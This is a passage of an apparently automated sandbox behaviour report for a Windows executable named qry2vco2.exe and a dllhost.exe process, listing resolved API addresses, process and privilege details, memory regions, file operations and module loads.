| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:12:46 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #184: dllhost.exe
0
0
| Information | Value |
|---|---|
| ID | #184 |
| File Name | c:\windows\system32\dllhost.exe |
| Command Line | C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:26, Reason: Self Terminated |
| Monitor Duration | 00:00:12 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa24 |
| Parent PID | 0x23c (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
CF4
0x
56C
0x
DA8
0x
D90
0x
41C
0x
384
0x
D94
0x
A38
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000f0eacb0000 | 0xf0eacb0000 | 0xf0eaccffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f0eacb0000 | 0xf0eacb0000 | 0xf0eacbffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000f0eacc0000 | 0xf0eacc0000 | 0xf0eacc6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f0eacd0000 | 0xf0eacd0000 | 0xf0eace3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f0eacf0000 | 0xf0eacf0000 | 0xf0eadeffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f0eadf0000 | 0xf0eadf0000 | 0xf0eadf3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f0eae00000 | 0xf0eae00000 | 0xf0eae01fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xf0eae10000 | 0xf0eaecdfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000f0eaed0000 | 0xf0eaed0000 | 0xf0eaed0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f0eaee0000 | 0xf0eaee0000 | 0xf0eaee6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f0eaef0000 | 0xf0eaef0000 | 0xf0eaef0fff | Pagefile Backed Memory | r |
|
|
|
- |
| imm32.dll | 0xf0eaf00000 | 0xf0eaf33fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000f0eaf00000 | 0xf0eaf00000 | 0xf0eaf00fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f0eaf10000 | 0xf0eaf10000 | 0xf0eaf10fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f0eaf20000 | 0xf0eaf20000 | 0xf0eaf22fff | Pagefile Backed Memory | r |
|
|
|
- |
| windowsshell.manifest | 0xf0eaf30000 | 0xf0eaf30fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000f0eaf40000 | 0xf0eaf40000 | 0xf0eaf41fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f0eaf80000 | 0xf0eaf80000 | 0xf0eb07ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f0eb080000 | 0xf0eb080000 | 0xf0eb17ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f0eb180000 | 0xf0eb180000 | 0xf0eb23ffff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0xf0eb240000 | 0xf0eb315fff | Memory Mapped File | r |
|
|
|
- |
| sortdefault.nls | 0xf0eb240000 | 0xf0eb576fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000f0eb580000 | 0xf0eb580000 | 0xf0eb67ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f0eb680000 | 0xf0eb680000 | 0xf0eb77ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f0eb780000 | 0xf0eb780000 | 0xf0eb87ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f0eb880000 | 0xf0eb880000 | 0xf0eb97ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f0eb980000 | 0xf0eb980000 | 0xf0ebb07fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000f0ebb10000 | 0xf0ebb10000 | 0xf0ebc90fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000f0ebca0000 | 0xf0ebca0000 | 0xf0ed09ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f0ed0a0000 | 0xf0ed0a0000 | 0xf0ed1effff | Private Memory | rw |
|
|
|
- |
| private_0x000000f0ed0a0000 | 0xf0ed0a0000 | 0xf0ed19ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f0ed1e0000 | 0xf0ed1e0000 | 0xf0ed1effff | Private Memory | rw |
|
|
|
- |
| ole32.dll | 0xf0ed1f0000 | 0xf0ed330fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00007df5ffbf0000 | 0x7df5ffbf0000 | 0x7ff5ffbeffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff756d8e000 | 0x7ff756d8e000 | 0x7ff756d8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff756d90000 | 0x7ff756d90000 | 0x7ff756e8ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff756e90000 | 0x7ff756e90000 | 0x7ff756eb2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff756eb3000 | 0x7ff756eb3000 | 0x7ff756eb4fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff756eb5000 | 0x7ff756eb5000 | 0x7ff756eb6fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff756eb7000 | 0x7ff756eb7000 | 0x7ff756eb8fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff756eb9000 | 0x7ff756eb9000 | 0x7ff756ebafff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff756ebb000 | 0x7ff756ebb000 | 0x7ff756ebcfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff756ebd000 | 0x7ff756ebd000 | 0x7ff756ebefff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff756ebf000 | 0x7ff756ebf000 | 0x7ff756ebffff | Private Memory | rw |
|
|
|
- |
| dllhost.exe | 0x7ff757890000 | 0x7ff757896fff | Memory Mapped File | rwx |
|
|
|
- |
| thumbcache.dll | 0x7ffc47230000 | 0x7ffc4727afff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7ffc4cbd0000 | 0x7ffc4ce43fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ffc511b0000 | 0x7ffc51332fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7ffc52d70000 | 0x7ffc52e05fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc53a90000 | 0x7ffc53ac2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc54210000 | 0x7ffc54226fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc54280000 | 0x7ffc5428afff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc543a0000 | 0x7ffc543c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffc54f80000 | 0x7ffc55032fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffc55280000 | 0x7ffc552b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffc55380000 | 0x7ffc554dbfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffc55910000 | 0x7ffc559cdfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffc57970000 | 0x7ffc57a14fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Process #185: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #185 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula "recorder.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:18, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x958 |
| Parent PID | 0x408 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
440
0x
F18
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x002d0000 | 0x002f9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x005fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x006fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000700000 | 0x00700000 | 0x008affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x00887fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000008a0000 | 0x008a0000 | 0x008affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008b0000 | 0x008b0000 | 0x00a30fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a40000 | 0x00a40000 | 0x01e3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001e40000 | 0x01e40000 | 0x01faffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
